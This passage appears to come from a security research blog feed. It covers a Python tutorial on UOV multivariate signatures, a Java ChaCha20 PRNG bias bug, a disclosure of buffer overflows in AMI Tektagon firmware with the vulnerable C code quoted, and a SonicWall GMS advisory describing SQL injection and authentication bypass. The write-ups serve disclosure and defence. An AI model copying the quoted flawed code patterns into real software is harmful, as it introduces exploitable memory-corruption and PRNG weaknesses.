 [0 1 0 0 0 0 0 0 0]
 [0 0 1 0 0 0 0 0 0]
 [0 0 0 1 0 0 0 0 0]
 [0 0 0 0 1 0 0 0 0]
 [0 0 0 0 0 1 0 0 0]
 [0 0 0 0 0 0 1 0 0]
 [0 0 0 0 0 0 0 1 0]
 [0 0 0 0 0 0 0 0 1]]

Public (Verification) Key

We compute our public verification key by composing each f in F with L, i.e. f ∘ L. This is made easy as we can do this in quadratic form: each f_p in P is computed as L_T · f · L for each f in F, where L_T is the transpose of L.

def generate_public_key(F,L):
    L_T = np.transpose(L)
    P = []
    for f in F:
        s1 = np.matmul(L_T,f)
        s2 = np.matmul(s1,L)
        P.append(s2) 
    return P

The following is our collection of o=3 polynomials that make up our public verification key P again represented as a list of matrices, that result from the above calculation using F and L that we generated as our private key.

Public Key = F ∘ L = 

0:
[[246  74 117 248  72   5 143 224 135]
 [116  10  17 156  68 243 203 128 192]
 [148 215 239 220 212  65 184 253 214]
 [211 116 203 186  61  26 104  21 157]
 [155  87  23 174  10 242  98 215 238]
 [189 209 203 142 221 105 179 173   8]
 [109  27 161 201 155 133 197 180  66]
 [227 228 150  92 248  73 213 205 192]
 [ 51  30 193 111 242 244  74 177 154]]

1:
[[ 92 131 253  40 192 243 101 228 217]
 [114  70  34 148 150 144  29  53 193]
 [127 161   2 248  42 126 245 122 175]
 [249  59 218  30  46 114  58 214  97]
 [ 12 212 246 155  93  76 168 162 120]
 [108  53 107 153   7 216 233 137  93]
 [249 177  82 164   4 117  25 179 152]
 [107 105 135  34 189  97  53  29  38]
 [140 127 214 137 206 171  45 109 110]]

2:
[[156  73  34 203 141 187  88  54 168]
 [ 90 252 145  72 161 130  93 150 169]
 [112 158  75   6 174 157 206 192 193]
 [214 198 116 243 190 194 214  22   5]
 [ 74 231 235 113 151  91  75 122 123]
 [200  77 208 125  99 169 229 104  55]
 [184 128  22  88  42 170 139 233 189]
 [ 27 149  64  89  77 158 248  65 150]
 [ 93  59 212 106 143 221  24 178 242]]

Signing

To sign we first define some helper functions. The first picks v=6 random vinegar variable values rvv as specified in the signing algorithm.

def generate_random_vinegar(v):
    vv = np.random.randint(256, size=v, dtype=np.uint8)
    rvv = GF256(vv)
    return rvv

We then substitute this selection of random vinegar variables rvv in each f in F, collecting terms such that the only remaining unknowns will be o1,o2,o3 – our oil variables.

def sub_vinegar_aux(rvv,f,o,v):
    coeffs = GF256([0]* (o+1))
    # oil variables are in 0 <= i < o
    # vinegar variables are in o <= i < n
    # (the comparison operators in this function were mangled in the
    # original listing and have been reconstructed from the case analysis)
    for i in range(o+v):
        for j in range(i,o+v):
            # by cases
            # oil and oil do not mix
            if i < o and j < o:
                pass
            # vinegar and vinegar contribute to the constant term
            elif i >= o and j >= o:
                ij = GF256(f[i,j])
                vvi = GF256(rvv[i-o])
                vvj = GF256(rvv[j-o])
                coeffs[-1] += np.multiply(np.multiply(ij,vvi), vvj)
            # have mixed oil and vinegar variables that contribute to o_i coeff
            elif i < o and j >= o:
                ij = GF256(f[i,j])
                vvj = GF256(rvv[j-o])
                coeffs[i] += np.multiply(ij,vvj)
            # condition is not hit as we have covered all combos
            else:
                pass
    return coeffs

We collect the equations once the fixed random vinegar variables have been substituted (only leaving our unknown oil variables). This will be a linear system of o=3 equations in o=3 unknowns – which is easy to solve!

def sub_vinegar(rvv,F,o,v):
    subbed_rvv_F = []
    for f in F:
        subbed_rvv_F.append(sub_vinegar_aux(rvv,f,o,v))
    los = GF256(subbed_rvv_F)
    return los

To solve the system we separate the coefficients on the unknown oil variables M from the constant terms c. We then take our message m (which is an element of length o in GF(256)) and subtract c from it to form the y that we need to find a solution x for. We then solve for said x. Finally, we compute the signature s for m by stacking x with the selected random vinegar variables rvv and taking s as the product of the inverse of our secret transformation L_inv and the stacked solution x and the random vinegar variables rvv.

def sign(F,L_inv,o,v,m):
    signed = False
    while not signed:
        try:
            rvv = generate_random_vinegar(v)
            los = sub_vinegar(rvv,F,o,v)
            M = GF256(los[:, :-1])
            c = GF256(los[:, [-1]])
            y = np.subtract(m,c)
            x = np.vstack((np.linalg.solve(M,y), rvv.reshape(v,1)))
            s = np.matmul(L_inv, x)
            signed = True
        except:
            signed = False
    return s

For this example we select m=[10,25,11], the birthday (October 25, 1811) of Évariste Galois, the father of finite fields.

m =
[[10]
 [25]
 [11]]

We then select our random vinegar values rvv.

rvv = [120 104 210   3   0 154]

After substitution we are left with the following M.

M =
[[252 223  17 183]
 [200 254 141 176]
 [116 200  15  43]]

We separate out the constant terms c of the linear oil system and subtract them from the message values m and solve the linear system using Gaussian elimination.

y = m-c =
 [[10]
 [25]
 [11]] 
-
 [[183]
 [176]
 [ 43]]
 =
 [[189]
 [169]
 [ 32]]

f(o1,o2,o3) =
 [[252 223  17]
 [200 254 141]
 [116 200  15]]|[[189]
 [169]
 [ 32]]

This yields the solution o1,o2,o3 =
 [[68]
 [49]
 [94]]

We stack this solution x with our random vinegar variables rvv to form a complete solution to the non-linear multivariate polynomial system of equations:

[x | rvv] =
 [[ 68]
 [ 49]
 [ 94]
 [120]
 [104]
 [210]
 [  3]
 [  0]
 [154]]

We can check our solution by plugging it into the central map.

m = x_T · F · x =
 [[10]
 [25]
 [11]]

We see that this check works and we finally we compute our signature as:

s = L_inv · x =
 [[ 50]
 [ 79]
 [107]
 [122]
 [209]
 [241]
 [ 80]
 [173]
 [241]]

Verification

To verify the message we simply compute P(s1,s2,...,sn) and check that the result (our computed message) is equal to the corresponding original message. This is made easy as we can do this in quadratic form, thus for each f_p in P we compute s_T · f_p · s where s_T is the transpose of s.

def verify(P,s,m):
    cmparts= []
    s_T = np.transpose(s)
    for f_p in P:
        cmp1 = np.matmul(s_T,f_p)
        cmp2 = np.matmul(cmp1,s)
        cmparts.append(cmp2[0])
    computed_m = GF256(cmparts)
    return computed_m, np.array_equal(computed_m,m)

Now let’s see if our signature is correct given our public_key and message.

computed_message = s_T · P · s=
[[10]
 [25]
 [11]]

computed_message == message is True

Hey, it works!

Exhaustive Test

As a sanity check, we wrote a test function that generates a random private/public key pair for the small parameters o=2, v=4. We continue to work over the field GF(256). With these parameters, the messages we will be signing are vectors of length 2 of field elements in GF(256). As field elements take on values in the range 0 to 255, there are 256**2 = 65536 total messages in the message space. We generate all messages in the message space and check that we can generate valid signatures for all of them.

# test over the entire space of messages for small parameters
def test():
    o = 2
    v = 4
    F, L, L_inv = generate_private_key(o, v)  # signing key
    P = generate_public_key(F, L)             # verification key

    total_tests = 0
    tests_passed = 0

    for m1 in range(256):
        for m2 in range(256):
            total_tests += 1
            m = GF256([[m1], [m2]])
            s = sign(F, L_inv, o, v, m)
            computed_m, verified = verify(P, s, m)
            if verified:
                tests_passed += 1
            print(f"Test: {total_tests}\nMessage:\n{m}\nSignature:\n{s}\nVerified:\n{verified}\n")

    print(f"{tests_passed} out of {total_tests} messages verified.")

We now look at the output of the test and see that we were able to generate signatures for every message in the message space. This instills confidence in the validity of our implementation. The full test_results.txt file for one random key pair is included in the GitHub repository of our implementation that is linked above.

Test: 1
Message:
[[0]
 [0]]
Signature:
[[ 53]
 [211]
 [161]
 [  6]
 [228]
 [124]]
Verified:
True
.
.
.
Test: 65536
Message:
[[255]
 [255]]
Signature:
[[144]
 [ 98]
 [143]
 [  0]
 [124]
 [122]]
Verified:
True

65536 out of 65536 messages verified.

Concluding Remarks

Multivariate cryptography has seen renewed interest recently due to the call for the standardization of post-quantum cryptography. Recall that the main issue with UOV signature schemes is that the public keys are huge. Many contemporary schemes have tried to solve this issue. For instance, Rainbow is a scheme based on a layered UOV approach that reduces the size of the public key. It was selected as one of the three NIST Post-quantum signature finalists. However, a key recovery attack was discovered by Beullens and Rainbow is no longer considered secure. Note, this attack does not break UOV, just Rainbow. Furthermore, MAYO was put forth as a possible post-quantum signature candidate in NIST’s call for additional PQC signatures. MAYO uses small public keys comparable to those of lattice based schemes that are “whipped-up” during signing and verification – for details go to the MAYO website. In addition to exploring Rainbow and MAYO, it may interest the reader to explore Hidden Field Equations, which is another construction of multivariate cryptography schemes.

Acknowledgments

Thank you to Paul Bottinelli and Elena Bakos Lang for their thorough reviews and thoughtful feedback on this blog post. All remaining errors are the author’s.

Public Report – Penumbra Labs R1CS Implementation Review

21 August 2023 at 15:59

In July 2023 Penumbra Labs engaged NCC Group’s Cryptography Services team to perform an implementation review of their Rank-1 Constraint System (R1CS) code and the associated zero-knowledge proofs within the Penumbra system. These proofs are built upon decaf377 and poseidon377, which have been previously audited by NCC Group, with a corresponding public report. The review was performed remotely with three consultants contributing 20 person-days over a period of two weeks, along with one additional consultant shadowing.

The review was scoped to R1CS-related functionality within the Penumbra codebase, including fixed-point arithmetic and proofs for Spend, Output, Swap, Swap Claim, Delegator Vote, and Undelegate Claim, alongside modifications made to Zcash Sapling relating to key hierarchy, asset-specific generators, note format, tiered commitment tree, nullifier derivation, balance commitment, and usage of payload keys. R1CS gadgets in decaf377 and poseidon377 were also reviewed.

Dancing Offbit: The Story of a Single Character Typo that Broke a ChaCha-Based PRNG

22 August 2023 at 13:00

Random number generators are the backbone of most cryptographic protocols, the crucial cornerstone upon which the security of all systems rely, yet they remain often overlooked. This blog post presents a real-world vulnerability discovered in the implementation of a Pseudo-Random Number Generator (PRNG) based on the ChaCha20 cipher.

Discovery of a biased PRNG

During a recent engagement, we were tasked with reviewing a ChaCha20-based PRNG, following a design similar to the Rust ChaCha20Rng. The implementation under review was written in Java and a first pass over the source implementation did not reveal any glaring issue.

Similarly, a glance over the output produced by the PRNG seemed normal at first. As an example, the PRNG produced the following 32-byte sequence when seeded with a random seed:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19

Note that since Java does not support unsigned primitive types, bytes are interpreted in two’s complement representation and a byte can take any value from -128 to 127.

However, when generating longer outputs, some curious patterns started to emerge. Consider the following 128-byte output, seeded with the same random value as before:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19, 48, 41, 127, -90, -62, -31, -103, -59, -51, 82, 49, 72, 103, -112, 76, -67, 29, -88, 126, -101, -85, -1, -1, -1, 10, 81, 8, -76, -126, -1, -1, -1, -62, -21, 79, 104, -120, 55, -125, -70, 2, 108, -95, 74, -44, 89, -124, -20, 30, 76, -126, 90, 69, -1, -1, -1, 39, -110, -48, -34, 83, -1, -1, -1, 16, 41, 2, 115, -100, 96, 28, -65, -44, -73, 102, -123, 45, -11, -117, -128, 7, -55, -10, -50, -38, -1, -1, -1, 81, 127, -69, -22, 124, 82, 51, 112

Starting at byte 54, sequences of triplets of -1 are repeated multiple times, too often for this pattern to be random. Note that -1 is equivalent to the byte value 0xFF (that is, the byte exclusively composed of 1-bits: 0b1111 1111), but Java interprets and displays that value as -1.

Identifying the root cause

Driven by the feeling that something was amiss, we delved into the code once more and eventually narrowed down the faulty code to the rotateLeft32() function, a critical building block of ChaCha20. This function is excerpted below for convenience.

private static int rotateLeft32(int x, int k) {
    final int n = 32;

    int s = k & (n - 1);
    return x << s | x >> (n - s);
}

At first glance, this function seems to perform a fairly standard left rotation on 32-bit values. Since Java does not have a primitive type for unsigned integers, this function operates on signed integers. Upon more careful inspection, we discovered something wrong with the right shift operation performed in the return statement of the function. The >> operator used in the function above performs a signed right shift in Java (also known as an arithmetic right shift, or a sign-propagating right shift since it preserves the sign of the resulting number).

When shifting an integer by one with the >> operator, the most significant bit (i.e., the leftmost bit) is not unconditionally replaced by a zero, but by a bit corresponding to the sign bit of the shifted value (0 for a positive integer, 1 for a negative integer). Since the return value of the rotateLeft32() function is computed using a boolean “or” of that shifted quantity, a superfluous 1-bit resulting from shifting a negative input value will be propagated to the output. Hence, the rotateLeft32() function may produce incorrect results when performing the bitwise rotation of negative 32-bit integers.

In contrast, the operator >>> performs an unsigned right shift (or logical right shift) in Java, where the extra bits shifted off to the right are discarded and replaced with zero bits regardless of the sign of the original value. It is this operator that should have been used in the rotateLeft32() function. This subtle difference is very specific to Java. In Rust for example, the type of the value shifted dictates which shift variant to use, as explained in The Rust Reference book, in the section on Arithmetic and Logical Binary Operators:

Arithmetic right shift on signed integer types, logical right shift on unsigned integer types.
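The difference between the two Java operators can be modelled in a few lines of Python (a sketch: Python integers are arbitrary precision, so we mask to 32 bits and emulate Java's two's-complement int behaviour by hand):

```python
MASK32 = 0xFFFFFFFF

def to_i32(x):
    """Reduce to a signed 32-bit value, as Java's int would store it."""
    x &= MASK32
    return x - (1 << 32) if x & 0x80000000 else x

def java_shr(x, s):
    """Java's signed (arithmetic) >> on a 32-bit int."""
    return to_i32(x) >> s  # Python's >> on signed ints is arithmetic

def java_ushr(x, s):
    """Java's unsigned (logical) >>> on a 32-bit int."""
    return (x & MASK32) >> s

def rotate_left_buggy(x, k):
    """Mirrors the flawed rotateLeft32(): sign bit smears into the output."""
    s = k & 31
    return to_i32((x << s) | java_shr(x, 32 - s))

def rotate_left_fixed(x, k):
    """The corrected rotation using the logical shift."""
    s = k & 31
    return to_i32((x << s) | java_ushr(x, 32 - s))
```

Feeding 0x80000000 through both versions confirms the trace above: the buggy rotation by 16 yields 0xFFFF8000 (seventeen 1-bits), while the fixed rotation yields the expected 0x00008000. For non-negative inputs the two functions agree, which is why the bug only surfaces intermittently in the output stream.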

Impact

The impact of this issue in the rotation function could already be observed visually by the repeated presence of -1s. In order to understand why using a signed right shift results in an increased probability of generating -1 bytes, let us look at the ChaCha function using that left rotation operation, namely the Quarter Round function, see RFC 7539:

a += b; d ^= a; d <<<= 16;
c += d; b ^= c; b <<<= 12;
a += b; d ^= a; d <<<= 8;
c += d; b ^= c; b <<<= 7;

For each call to the ChaCha Quarter Round function, internal state variables are left-rotated (using the rotateLeft32() function) by some fixed values, as highlighted above. Consider what happens when left-rotating a value with a single 1-bit using the function above. For illustration purposes, we’ll use the value 0x80000000 which corresponds to the quantity 10000000 00000000 00000000 00000000 (split into 8-bit chunks for clarity, and where obvious repeated sequences of 0s are replaced with ...).

 rotateLeft32(1000 ... 0000, 16)
 = 1000 ... 0000 << 16 | 1000 ... 0000 >> 16
 = 00 ... 0 | 1100 ... 0000 >> 15
 = 1110 ... 0000 >> 14
 = ...
 = 11111111 11111111 10000000 00000000
 = 0xFFFF8000
 = {-1, -1, -128, 0}

In this case, a value containing a single 1-bit as input results in an output consisting of seventeen (17) 1s! This helps explain why the output that originally caught our eye contained so many -1 bytes.

The use of the incorrect shift operation introduces a damaging bias in the output distribution. To illustrate this bias, the figure below shows a plot of the output distribution of the ChaChaPRNG implementation when seeded with the same seed as in the examples, and used to generate a total of 10,000 32-byte samples. In the figure, the bytes are normalized to be in the [0, 255] range. The most striking outlier is the value 255 (the -1 discussed previously), which appears with probability over 20%. But other values also show significant biases, such as 0 (which appears with probability 2.46%) or 81 (which appears with probability 2.50%). In a truly random distribution, each byte value should appear with probability 1/256 ≈ 0.39%.

Research has shown that leaking as little as one bit of an ECDSA nonce could lead to full key recovery. Thus, using the output of this PRNG for cryptographic applications could completely break the security of the systems that rely upon it.

The fix

In this instance, the fix was pretty simple. Replacing the right-shift operator in the rotateLeft32() function by an unsigned right shift ( >>> ) did the trick:

return (x << s) | (x >>> (n - s));

The figure below shows the “corrected” output distribution after modifying rotateLeft32(), with the same number of samples and the same seed as for the first figure. The vertical axis is cut off at the 3% mark to better show the distribution without the visualization being skewed by the higher-percentage 255 output. The corrected output distribution looks much more uniform.

Conclusion

When writing security-critical code, low level details such as bit operations on underlying number representation can have colossal consequences. In this post, we described a real-world case of a single missing “greater-than” character that totally broke the security of the PRNG built on top of the buggy function. This highlights the challenges of porting implementations between languages supporting different primitive types and arithmetic operations.

I’d like to thank Giacomo Pope and Gérald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

LeaPFRogging PFR Implementations

23 August 2023 at 13:51

Back in October of 2022, this announcement by AMI caught my eye. AMI has contributed a product named “Tektagon Open Edition” to the Open Compute Project (OCP). 

Tektagon OpenEdition is an open-source Platform Root of Trust (PRoT) solution with foundational firmware security features that detect platform firmware corruption, recover the firmware and protect firmware integrity. With its open-source code, Tektagon OpenEdition™ augments transparency, resulting in high-quality code […] 

I decided to dig in and audit the recently open sourced code. But first, some background: Tektagon is a hardware root-of-trust (HRoT) that implements Intel PFR 2.0. So… What exactly is PFR? 

Platform Firmware Resiliency 

PFR, or Platform Firmware Resiliency, is a standard defined by everyone’s favorite standards body, NIST, in SP 800-193. The specification describes guidelines that support the resiliency of platform firmware and data against destructive attacks or unauthorized changes. These security properties are upheld by a new HRoT device that implements the PFR logic. 

At its core, PFR acknowledges that in addition to the boot firmware (e.g., the BIOS), a platform contains numerous other peripheral devices which execute firmware and therefore also require integrity verification. Examples of these peripherals typically include GPUs, network cards, storage controllers, display controllers, and so on. Many of these peripherals are highly privileged (e.g., DMA capable), and so they are attractive targets for an attacker. It is important that their firmware images are protected from tampering. That is, if an attacker could compromise one of these peripherals by tampering with its firmware, they might be able to: 

  1. Achieve persistence on the platform across reboots.
  2. Pivot towards compromising other more highly privileged firmware components.  
  3. Violate multi-tenant isolation and confidentiality expectations in cloud environments. 

Although these motivations sound like they are centered around only protecting the integrity of the platform firmware and its data assets, the SP 800-193 specification also describes how PFR is crucial for protecting firmware availability. Here, availability refers to the ability to recover from corrupted flash storage, which might occur due to a failed firmware update, or perhaps, cosmic rays that cause bit flips in flash.

In the PFR specification, these security requirements appear as three guiding principles:  

  1. Protection: How authenticity and integrity of firmware and data should be upheld. 
  2. Detection: How to detect when firmware or data integrity has been violated.  
  3. Recovery: How to restore the platform to a known good state.  

This is a somewhat crowded technology space. In addition to AMI’s Tektagon product, many other vendors have created their own PFR (or PFR-like) solutions whose purpose is to help assure device firmware authenticity and availability, further complicating the already complex x86 system boot process. Examples include Microsoft’s Project Cerberus which is used in Azure, Intel PFR, Google Titan, Lattice’s Root of Trust FPGA solution, and more. 

PFR Attack Surfaces 

PFR introduces a new device, a microcontroller or FPGA, that positions itself as the man-in-the-middle on the flash memory SPI bus. By sitting on the bus, PFR chipsets can interpose all bus transactions. Whenever a device (such as the Board Management Controller (BMC) or Platform Controller Hub (PCH)) reads or writes SPI flash, the PFR chipset proxies that request. This grants PFR the crucial responsibility of verifying the authenticity and integrity of all code and data that resides in the persistent storage media. 

A simplified block diagram of a typical PFR solution

However, by interposing buses in this manner, PFR exposes itself to a rather large attack surface. It must read, parse, and verify various binary blobs (firmware and data) that exist in flash. Such parsing can be a tedious and delicate process. If the code is not written defensively (a challenge for even the best C programmers) then memory safety violations may arise. Another concern is race conditions such as time-of-check-time-of-use (TOCTOU) or double fetch problems. 

The PFR attack surface is also expanded by the fact that it communicates with other devices via I2C or SMBus. The bus typically carries the MCTP and SPDM protocols. Without going into too much detail about these specifications, these protocols are used to:

  1. Establish a secure messaging channel between devices and IP blocks.
  2. Perform device firmware attestation.
  3. Detect and recover from TCB (Trusted Computing Base) failures.

Within the HRoT, these command handlers may accept variable length arguments, and so memory safety is again required when managing the message queues. 

So, with that in mind, I decided to jump into the recently open-sourced AMI Tektagon project and hunt for bugs. 

Vulnerability #1: I2C Command Handler 

This first vulnerability occurs in the PCH/BMC command handler. This is the same I2C communication interface that was mentioned above. Two of the command handlers violate memory safety.  

uint8_t gUfmFifoData[64]; 
uint8_t gReadFifoData[64]; 
... 
uint8_t gFifoData; 
... 
static unsigned int mailBox_index; 

uint8_t PchBmcCommands(unsigned char *CipherText, uint8_t ReadFlag) 
{ 
    byte DataToSend = 0; 
    uint8_t i = 0; 

    switch (CipherText[0]) { 
        ... 
        case UfmCmdTriggerValue: 
            if (ReadFlag == TRUE) { 
                DataToSend = get_provision_commandTrigger(); 
            } else { 
                if (CipherText[1] & EXECUTE_UFM_COMMAND) { 
                    ... 
                } else if (CipherText[1] & FLUSH_WRITE_FIFO) { 
                    memset( gUfmFifoData, 0, sizeof(gUfmFifoData)); 
                    gFifoData = 0; 
                } else if (CipherText[1] & FLUSH_READ_FIFO) { 
                    memset( gReadFifoData, 0, sizeof(gReadFifoData)); 
                    gFifoData = 0; 
                    mailBox_index = 0; 
                } 
            } 
            break; 

        case UfmWriteFIFO: 
            gUfmFifoData[gFifoData++] = CipherText[1]; 
            break; 

        case UfmReadFIFO: 
            DataToSend = gReadFifoData[mailBox_index]; 
            mailBox_index++; 
            break; 
        ...

Above, the UfmWriteFIFO command can eventually write data past the end of the gUfmFifoData[] array. This may occur if the attacker issues more than 64 commands in sequence without flushing the FIFO by sending a UfmCmdTriggerValue command. Because gFifoData is a uint8_t type, this enables an attacker to overwrite up to 192 bytes past the end of the FIFO buffer. 

Similarly, the UfmReadFIFO command can read data out-of-bounds by repeated invocations of the command between FIFO flushes. This OOB data appears to be eventually disclosed in the I2C response message in DataToSend. Because mailBox_index is an unsigned int type, this would enable an attacker to disclose a significant quantity of PFR SRAM, albeit relatively slowly due to only 1 byte being exposed at a time. 
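The reachable out-of-bounds window for the write path can be counted with a quick model of the 8-bit index (a sketch of the arithmetic only, not the vendor code):

```python
def oob_window(fifo_size=64, index_bits=8):
    """Count the indices an unsigned counter of the given width can reach
    past the end of a fifo_size-byte buffer before it wraps back to 0."""
    return sum(1 for i in range(1 << index_bits) if i >= fifo_size)
```

Here oob_window() evaluates to 192, matching the figure above for the uint8_t gFifoData index; for the read path, where the index is a full unsigned int, the window is effectively unbounded.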

I estimate that these command processing vulnerabilities can be triggered in three different scenarios: 

  1. A physical attacker that is tampering with the I2C bus traffic and injecting PCH/BMC commands to the Tektagon device. Physical attacks can often be discounted for cloud platforms where data centers are expected to be secured facilities, however thought should be given to whether a given deployment is vulnerable to supply chain attacks and hardware implants, as well as malicious or compelled insiders (especially in cases where servers are deployed in third party data centers where physical security is harder to monitor). 
  2. Given the prevalence of BMC vulnerabilities that have been discovered over the last several years, a more likely attack scenario is that a compromised BMC is aiming to pivot towards compromising the Tektagon device in order to undermine the platform’s PFR capabilities or to achieve persistence. 
  3. If the I2C bus happened to be a shared bus with multiple other peripherals of lesser privilege, then one could imagine a scenario where the host kernel (in the CPU) could access this bus and communicate directly with the PFR device, even if that was never the intention. 

Vulnerability #2: SPI Flash Parsing 

The next vulnerability occurs when the Tektagon firmware reads a public key from SPI flash. In the linked GitHub issue, I found and reported five instances where this same bug appears throughout the Tektagon source code, but for the sake of brevity, I will focus on just one simple example here. 

int get_rsa_public_key(uint8_t flash_id, uint32_t address, struct rsa_public_key *public_key) 
{ 
    int status = Success; 
    uint16_t key_length; 
    uint8_t  exponent_length; 
    uint32_t modules_address, exponent_address; 

    // Key Length 
    status = pfr_spi_read(flash_id, address, sizeof(key_length), &key_length); 
    if (status != Success){ 
        return Failure; 
    } 
 
    modules_address = address + sizeof(key_length); 
    // rsa_key_module 
    status = pfr_spi_read(flash_id, modules_address, key_length, public_key->modulus); 
    ... 

The code above performs two SPI flash reads. The first read operation obtains a size value (key_length) from a public key structure in flash, and the second read operation uses this key_length to obtain the RSA public key modulus.  

The bug arises due to lack of input validation. If the contents of external SPI flash were tampered with by an attacker, then key_length may be larger than expected. This length value is not validated before being passed as the size argument to the second pfr_spi_read() call, which can lead to out-of-bounds memory writes of public_key->modulus[].  

The modulus buffer is RSA_MAX_KEY_LENGTH (512) bytes in length, and in all locations where get_rsa_public_key() is called, the public_key structure is declared on the stack. Because the Zephyr build config used by Tektagon does not define CONFIG_STACK_CANARIES, such a stack-based memory corruption vulnerability would be highly exploitable. 
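The defensive pattern that is missing here is simple to state: validate the attacker-controlled length against the destination buffer before using it as a copy size. A minimal Python model of that check (the constant name follows the excerpt; everything else is a hypothetical stand-in for the C code):

```python
RSA_MAX_KEY_LENGTH = 512  # size of public_key->modulus in the excerpt

def read_modulus(flash: bytes, key_length: int):
    """Return the modulus bytes, or None if the length read from untrusted
    flash would overflow the fixed-size destination buffer."""
    if not 0 < key_length <= RSA_MAX_KEY_LENGTH:
        return None  # reject rather than copy out of bounds
    return flash[:key_length]
```

With this check in place, a tampered key_length of, say, 0xFFFF is rejected instead of driving a 64 KB write into a 512-byte stack buffer.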

Conclusion

These two vulnerabilities were extremely shallow, and I discovered them both in the same afternoon after first pulling the source code from GitHub. I am fairly certain that other vulnerabilities exist in this code.  

(As an aside, you might also be interested to know that Tektagon is based on the Zephyr RTOS, for which we published a research report a few years back, highlighting numerous vulnerabilities in both its implementation and design.) 

These bugs are great illustrations of how a “security feature” is not always a “secure feature”. Although PFR aims to improve platform security, it does so at the cost of introducing new attack surfaces. Bugs in these attack surfaces can be abused to achieve privilege escalation by the very same adversaries and threats that PFR is designed to defend against – that is, threats involving maliciously tampered SPI flash contents, and adversaries who have compromised a peripheral device and are seeking to pivot laterally to attack another device firmware. 

Think carefully about the threat model of your products, and how adding new features and attack surfaces might affect your overall security posture. As always, we recommend you perform a full assessment of any third-party firmware components before they make it into your product. This is just as true for open source as it is for proprietary code bases, and in particular, new and untested components and technologies. 

As of April 6th 2023, these vulnerabilities were fixed in commit d6d935e. No CVEs were issued by AMI. 

Disclosure Timeline 

  • Oct 25, 2022 – Initial disclosure on GitHub. 
  • Nov 3, 2022 – Response from vendor indicating that fixes are in progress. 
  • Jan 6, 2023 – NCC Group requests an update. 
  • Jan 13, 2023 – Vendor communicated a plan to release fixes by end of January. 
  • Feb 10, 2023 – NCC Group requests an update. 
  • Feb 13, 2023 – Vendor revised plan to release fixes by end of February or early March. 
  • Mar 31, 2023 – NCC Group requests another update.
  • Apr 4, 2023 – Vendor indicates the next release is planned on or before the 2nd week of April.
  • Apr 6, 2023 – Commit d6d935e reorganizes the repo. It fixes vulnerability #1 but only partially fixes vulnerability #2.
  • May 2, 2023 – NCC Group reviewed above commit and provided detailed analysis of the unfixed issues.
  • May 5, 2023 – Vendor communicated that the remaining fixes will land by May 12th.
  • May 31, 2023 – NCC Group queried the status of the fixes.
  • July 25, 2023 – Vendor indicated that remaining unfixed functions are dead/unused code.
  • Aug 18, 2023 – NCC Group reviewed the code to confirm that the functions are unused.
  • Aug 23, 2023 – Publication of this advisory.

Technical Advisory – SonicWall Global Management System (GMS) & Analytics – Multiple Critical Vulnerabilities

24 August 2023 at 13:08

Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass – CVE-2023-34133

Title: Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help protect against SQL injection attacks could be bypassed.

Impact

An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.

Web Service Authentication Bypass – CVE-2023-34124

Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.

The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.

Impact

An attacker with knowledge of the authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.

Predictable Password Reset Key – CVE-2023-34123

Title: Predictable Password Reset Key
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.

An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.

Impact

An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.

CAS Authentication Bypass – CVE-2023-34137

Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

